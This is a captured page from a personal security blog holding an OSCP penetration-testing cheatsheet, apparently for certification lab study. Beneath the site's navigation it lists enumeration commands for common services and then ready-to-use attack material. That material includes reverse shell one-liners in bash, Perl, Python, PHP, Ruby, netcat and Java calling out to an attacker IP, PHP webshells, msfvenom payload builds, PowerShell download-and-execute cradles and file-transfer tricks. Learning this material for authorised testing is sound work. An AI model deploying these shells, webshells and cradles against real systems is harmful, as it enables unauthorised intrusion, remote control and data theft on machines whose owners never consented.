www.noobsec.net
Open in
urlscan Pro
52.58.254.253
Public Scan
URL:
https://www.noobsec.net/oscp-cheatsheet/
Submission: On May 28 via manual from IT — Scanned from IT
Submission: On May 28 via manual from IT — Scanned from IT
Form analysis 0 forms found in the DOM
Text Content
noobsec
Active Directory Cheatsheet
Active Directory (AD) Cheatsheet This post assumes that opsec is not required
and you can be as nois...
Kerberoasting
Attacking Kerberos - Kerberoasting Introduction Kerberoasting is a very popular
attack in the Active...
Introduction to Kerberos
Introduction to Kerberos Hi and welcome to the second post in the Active
Directory series. In this p...
Introduction to Active Directory
Introduction to Active Directory Prologue Hello there! Welcome to the first post
in the Active Direc...
CRTP Cheatsheet
CRTP Cheatsheet This cheatsheet corresponds to an older version of PowerView
deliberately as this is...
mimikatz-cheatsheet
Mimikatz Cheatsheet Dump Creds Invoke-Mimikatz -DumpCreds Invoke-Mimikatz
-DumpCreds -ComputerName @...
Getting Into Cybersecurity - Red Team Edition
Getting Into Cybersecurity - Red Team Edition Introduction I came across this
question and was asked...
HackTheBox - Bart Writeup w/o Metasploit
HackTheBox - Bart Writeup w/o Metasploit Introduction Bart is a retired Windows
machine from HackThe...
HackTheBox - Bashed Writeup w/o Metasploit
HackTheBox - Bashed Writeup w/o Metasploit Introduction Bashed is a retired
HackTheBox machine, rate...
HackTheBox - Lame Writeup w/o Metasploit
HackTheBox - Lame Writeup w/o Metasploit Introduction Lame was the first machine
on the HackTheBox p...
MySQL Injection Cheatsheet
MySQL Injection cheatsheet Testing checklist Name Character Function Single
quote ' String terminato...
HackTheBox - Falafel Writeup w/o Metasploit
HackTheBox - Falafel Writeup w/o Metasploit Introduction Falafel is a retired
HackTheBox machine and...
SQL Injection 0x03 - Blind Boolean Attacks
SQL Injection 0x03 - Blind Boolean Attacks Introduction Blind SQL injection are
the type of SQL inje...
SQL Injection 0x02 - Testing and UNION Attacks
SQL Injection 0x02 - Testing and UNION Attacks Introduction Hi, welcome to the
second post of the sq...
HackTheBox - Cronos Writeup w/o Metasploit
HackTheBox - Cronos Writeup w/o Metasploit Introduction Cronos is a HackTheBox
retired machine. It i...
SQL Injection - 0x01
SQL Injection 0x01 Hi, welcome to the first post of the SQL injection series.
Before we dive into th...
File Inclusion
File Inclusion Introduction File inclusion vulnerabilities are of two types:
Remote File Inclusion (...
Linux Privilege Escalation
Linux Privilege Escalation Cheatsheet So you got a shell, what now? This
cheatsheet will help you wi...
OSCP Journey
OSCP Journey From a persistent n00b who couldn’t even hack a medium difficulty
machine on his ...
Buffer Overflow
Windows 32-Bit Buffer Overflow SLMail Example Practice these: SLMail - download
from exploit-db Brai...
Windows Privilege Escalation
Windows Privilege Escalation Cheatsheet Latest updated as of: 12 / June / 2022
So you got a shell, w...
root@localhost:~ #whoami
Who Am I? Hi, my name is Karan Bhayani. I am a security professional who likes
learning new things. ...
OSCP Cheatsheet
OSCP Cheatsheet General Enumeration - Nmap Replace $ip with target IP Initial
scan nmap -Pn -n -vvv ...
* OSCP
* OSCP Cheatsheet
* Linux PrivEsc Cheatsheet
* Windows PrivEsc Cheatsheet
* OSCP AD Cheatsheet
* OSCP Journey
* OSCP BOF
* HTB
* HTB Bart
* HTB Falafel
* HTB Cronos
* HTB Bashed
* HTB Lame
* Web Attacks
* File Inclusion
* SQLi 0x01
* SQLi 0x02
* SQLi 0x03
* SQLi Cheatsheet
* Cheatsheets
* OSCP Cheatsheet
* Linux PrivEsc Cheatsheet
* Windows PrivEsc Cheatsheet
* AD Cheatsheet
* CRTP Cheatsheet
* SQLi Cheatsheet
* Getting Started in Red Team
* About
* OSCP
* OSCP Cheatsheet
* Linux PrivEsc Cheatsheet
* Windows PrivEsc Cheatsheet
* OSCP AD Cheatsheet
* OSCP Journey
* OSCP BOF
* HTB
* HTB Bart
* HTB Falafel
* HTB Cronos
* HTB Bashed
* HTB Lame
* Web Attacks
* File Inclusion
* SQLi 0x01
* SQLi 0x02
* SQLi 0x03
* SQLi Cheatsheet
* Cheatsheets
* OSCP Cheatsheet
* Linux PrivEsc Cheatsheet
* Windows PrivEsc Cheatsheet
* AD Cheatsheet
* CRTP Cheatsheet
* SQLi Cheatsheet
* Getting Started in Red Team
* About
Table of contents
* General Enumeration - Nmap
* Banner Grabbing
* Port 21 - FTP
* Port 22 - SSH
* Port 53 - DNS
* Port 79 - Finger
* Port 80/443 - HTTP(S)
* Port 110 - POP3
* Port 139/445 - SMB
* Port 161 - SNMP
* Port 2049 - NFS
* Shells / Payloads
* Universal Listeners
* Linux
* Windows
* PHP Webshells
* Metasploit
* Upgrading your shell - Linux
* Escaping jailed Shells
* File Transfers
* Server
* Linux - HTTP
* Windows
* Port Forwarding
* Linux
* Windows
* Privilege Escalation
* Windows
* Linux
OSCP CHEATSHEET
GENERAL ENUMERATION - NMAP
Replace $ip with target IP
Initial scan
nmap -Pn -n -vvv -oN nmap/initial $ip
Copy
If no ports are found, scan in parts
nmap -Pn -n -vvv -p1-500 -oN nmap/partial $ip
Copy
Scan all ports
nmap -Pn -n -vvv -p- -oN nmap/allports $ip
Copy
Targeted scanning
nmap -Pn -n -vvv -p22,80 -oN nmap/targeted $ip
Copy
UDP Scanning
sudo nmap -Pn -n -vvv -sU -oN nmap/udp $ip
Copy
Automated nmap scanning (my preference is nmapAutomator, never missed a port)
# It is recommended to scan ONE IP at a time
# Do NOT overload the network
# All scans, consecutively: Quick, Targeted, UDP, All ports, Vuln scan, CVE scan, Gobuster, Nikto
nmapAutomator ip All
Copy
BANNER GRABBING
telnet ip port
nc -nv ip port
curl -iv $ip
Copy
PORT 21 - FTP
Nmap script scanning - will reveal anonymous access
nmap -Pn -n -vvv -p21 -sC -sV $ip
Copy
Checking anonymous access manually
ftp ip
ftp> USER anonymous
ftp> PASS anonymous
Copy
Easy view of FTP content - Browse to:
ftp://$ip
Copy
Uploading a binary or webshell
ftp> binary
ftp> put file/name
Copy
PORT 22 - SSH
Additional banner grabbing
ssh root@$ip
Copy
PORT 53 - DNS
# Get nameservers and domain name of the IP address
nslookup
nslookup> server $target_ip
nslookup> $target
# o/p: ns1.example.com
# Get all sub-domains
host -l -a example.com $target_ip # or ns1.example.com
Copy
PORT 79 - FINGER
Run this script with following wordlist
/usr/share/metasploit-framework/data/wordlists/unix_users.txt
Copy
PORT 80/443 - HTTP(S)
Get web server, version, potential OS
curl -i http://ip
Copy
Use Wappalyzer to identify technologies, web server, OS, database server
deployed
View-Source of pages to find interesting comments, directories, technologies,
web application being used, etc.
Finding hidden content Scanning each sub-domain and interesting directory is a
good idea
# Use small common wordlist first
# Use big wordlist next
# Use CMS specific wordlist if one is found
gobuster dir -u http://$ip -w /wordlist -o gobust.out
# Find technology specific content
gobuster dir -u http://$ip -w /wordlist -o gobust_php.out -x php
# Find hidden notes, readme, changelog
gobuster dir -u http://$ip -w /wordlist -o gobust_txt.out -x txt
Copy
Files to browse manually
/robots.txt
/sitemap.xml
# Make it throw an error
/doesnotexist
Copy
Run web server scanning
# Identifies CMS
# Identifies Shellshock
nikto -host $ip -o nikto.txt
Copy
Web application specific scanning WordPress, use API
wpscan --url http://$ip -e p,t,u --detection-mode aggressive > wpscan.log
Copy
Drupal, found here
droopescan scan drupal http://$ip -t 32
Copy
PORT 110 - POP3
# Login
telnet $ip 110
USER test
PASS test
# List and view mails
# O/P: <mail_number> <mail_length>
list
# View mail
retr <mail_number>
quit
Copy
PORT 139/445 - SMB
General enumeration
nmap -Pn -n -p139,445 --script smb-* $ip
enum4linux -a $ip
Copy
Enumerate hostname
nmblookup -A $ip
Copy
Get version - script available here
./smbver.sh $ip [port]
msf>use auxiliary/scanner/smb/smb_version
Copy
List shares Note: smbmap will state access type available, smbclient will NOT.
To check access type using smbclient, it’s best to access each share, read a
file, and write a file.
smbmap -H $ip
# Get share items recursively
smbmap -H $ip -R <share>
smbmap -H $ip -d <domain> -u <user> -p <password>
smbclient -L \\$ip -N
# Protocol Error?
smbclient -L \\$ip -N --option='client min protocol=NT1'
smbclient -L \\$ip -U <user>
Copy
Connecting to a share
# Anonymously
smbclient //$ip/share -N
# Authenticated
smbclient //$ip/share -U <username>
# Protocol Error?
smbclient //$ip/share -N --option='client min protocol=NT1'
Copy
PORT 161 - SNMP
MIB Values Windows Parameters 1.3.6.1.2.1.25.1.6.0 System Processes
1.3.6.1.2.1.25.4.2.1.2 Running Programs 1.3.6.1.2.1.25.4.2.1.4 Processes Path
1.3.6.1.2.1.25.2.3.1.4 Storage Units 1.3.6.1.2.1.25.6.3.1.2 Software Name
1.3.6.1.4.1.77.1.2.25 User Accounts 1.3.6.1.2.1.6.13.1.3 TCP Local Ports
# Brute force community strings
# echo public > community
# echo private >> community
# echo manager >> community
# for ip in $(seq 1 254);do echo 10.11.1.$ip;done > snmp-ips
onesixtyone -c community -i snmp-ips
# Enumerate entire MIB tree
snmpwalk -c public -v1 $ip
# Enumerate specific MIB Value
snmpwalk -c public -v1 $ip $MIB_Value
snmp-check $ip
Copy
PORT 2049 - NFS
# NFS < v4
# Enumerating shares available, and mount points
showmount -e $ip
showmount -a $ip
# Mounting, x = NFS Version
mount -t nfs -o vers=x $ip:<share> <local_dir>
# On target machine
# Find mount points on the target where SUID programs and scripts can be run from
mount | grep 'nosuid\|noexec'
Copy
SHELLS / PAYLOADS
UNIVERSAL LISTENERS
# Netcat
[sudo] rlwrap nc -nvlp <port>
# msf multi/handler
msf(exploit/multi/handler)> set payload path/to/payload
msf(exploit/multi/handler)> set LHOST <ip> # or <interface>
msf(exploit/multi/handler)> set LPORT <port>
Copy
LINUX
--------------------------------------------------------------------------------
ONE-LINERS
Credit to Pentest Monkey
# bash
/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/443 0>&1"
# Perl
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# PHP
php -r '$sock=fsockopen("10.10.10.10",443);exec("/bin/sh -i &3 2>&3");'
# Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",443).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)'
# Netcat : -u for UDP
nc [-u] 10.10.10.10 443 -e /bin/bash
# Netcat without -e : -u for UDP
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc [-u] 10.10.10.10 443 > /tmp/f
# Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5/dev/tcp/10.10.10.10/443;cat &5 >&5; done"] as String[])
p.waitFor()
Copy
REVERSE SHELL SCRIPTS
PHP reverse shell available here or locally
/usr/share/webshells/php/php-reverse-shell
Python PTY shells available here
WINDOWS
PowerShell reverse shell available here PHP reverse shell available here Netcat
for Windows available here
# PowerShell
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1
vi shell.ps1
# go to end of file, paste the following
Invoke-PowerShellTcp -Reverse -IPAddress [attacker_ip] -Port [attacker_port]
# close, reverse shell ready to use
# Netcat - use x64 or x32 as per target. powershell.exe or cmd.exe
nc.exe x.x.x.x <port> -e powershell.exe
Copy
PHP WEBSHELLS
# Basic. system() or shell_exec() or exec()
<?php system($_GET['cmd']);?>
# More functional
<?php
$ip = 'http://10.10.14.4/' # [:port] . Change this
# Upload
if (isset($_GET['fupload'])) {
file_put_contents($_GET['fupload'], file_get_contents($ip . $_GET['fupload']));
};
# Execute code
# shell_exec() or system() or exec()
if (isset($_GET['cmd'])) {
echo "<pre>" . exec($_GET['cmd']) . "</pre>";
};
?>
Copy
METASPLOIT
SYSTEM BINARIES
# Linux reverse shell - Staged
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell
# Linux reverse shell - Stageless
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell
# Windows reverse shell - Staged
msfvenom -p windows/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o reverse.exe
# Windows reverse shell - Stageless
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o reverse.exe
Copy
WEB
# PHP
msfvenom -p php/reverse_php
# ASPX
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f aspx -o shell.aspx
# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f raw -o shell.jsp
# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war -o shell.war
Copy
SHELLCODE
Select appropriate architecture
# Linux Staged - use python or c
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python
# Linux Stageless - use python or c
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python
# Windows Staged - use python or c
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python
# Windows Stageless - use python or c
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python
Copy
UPGRADING YOUR SHELL - LINUX
Upon initial access, it is crucial to achieve the highest functional shell
possible for privesc purposes!
# On victim machine
which python[3]
python[3] -c 'import pty;pty.spawn("/bin/bash")'
# background the listener using ctrl+z
stty -a # notice the number of rows and columns
stty raw -echo
# foreground the process: type fg, press enter
stty rows xx
stty columns xxx
export TERM=xterm-256color
Copy
ESCAPING JAILED SHELLS
Go here
FILE TRANSFERS
SERVER
# HTTP - Apache2
# cp file /var/www/html/file_name
sudo service apache2 start
# HTTP - Python. Default port 8000
# python2
sudo python -m SimpleHTTPServer 80
# python3
sudo python3 -m http.server 80
# SMB
sudo impacket-smbserver <share_name> <path/to/share>
# FTP
# apt-get install python-pyftpdlib
sudo python -m pyftpdlib -p 21
# TFTP (UDP)
sudo atftpd --daemon -port 69 /path/to/serve
# Netcat
nc -nvlp <port> < file/to/send
Copy
LINUX - HTTP
# Wget
wget http://<ip>/file_name -O /path/to/save/file
# Netcat
nc -nv <ip> <port> > file/to/recv
# cURL
curl http://<ip>/file_name --output file_name
Copy
WINDOWS
* HTTP
# Does not save file on the system
powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/<file_name>')"
# Saves file on the system
powershell.exe -nop -ep bypass -c "iwr -uri http://<ip>/<file_name> -outfile path/to/save/file_name"
powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadFile('http://<ip>/<file_name>','path/to/save/file_name')"
certutil.exe -urlcache -split -f http://<ip>/file file_save
Copy
* Wget.ps1
Copy
echo $storageDir = $pwd >> wget.ps1
$webclient = New-Object System.Net.WebClient >> wget.ps1
# Download file from
$url = "http://<ip>/file_name" >> wget.ps1
# Save file as
$file = "file_name"
echo $webclient.DownloadFile($url,$file) >>wget.ps1
# execute the script as follows
powershell.exe -nop -ep bypass -nol -noni -f wget.ps1
Copy
* TFTP (UDP)
tftp -i <ip> get file_name
Copy
* SMB
# cmd.exe
net use Z: \\<attacker_ip>\share_name
# To access the drive
Z:
# PowerShell
New-PSDrive -Name "notmalicious" -PSProvider "FileSystem" -Root "\\attacker_ip\share_name"
# To access the drive
notmalicious:
Copy
* FTP
ftp <ip>
ftp>binary
ftp>get file_name
# One-liner downloader
# in cmd.exe do not use quotes in an echo command
echo open <ip> >> download.txt
echo anonymous >> download.txt
echo anon >> download.txt
echo binary >> download.txt
get file_name >> download.txt
bye >> download.txt
ftp -s:download.txt
Copy
PORT FORWARDING
LINUX
* Local port forwarding
ssh <gateway> -L <local_port_to_listen_to>:<remote_host>:<remote_port>
Copy
* Remote port forwarding
ssh <gateway> -R <remote_port>:<local_host>:<local_port>
Copy
* Dynamic port forwarding
ssh -D <local proxy port> -p <remote port> <target>
Copy
WINDOWS
Chisel is a port forwarding tool for Linux as well as Windows, works over HTTP
and can be found here.
# On KALI
./chisel server --reverse --port 9001
# On Windows
.\chisel.exe client KALI_IP:9001 R:KALI_PORT:127.0.0.1:WINDOWS_PORT
Copy
PRIVILEGE ESCALATION
WINDOWS
Local enumeration + privilege escalation available here
LINUX
Local enumeration + privilege escalation available here
Please enable JavaScript to view the comments powered by Disqus.
Made with love...and copious amounts of coffee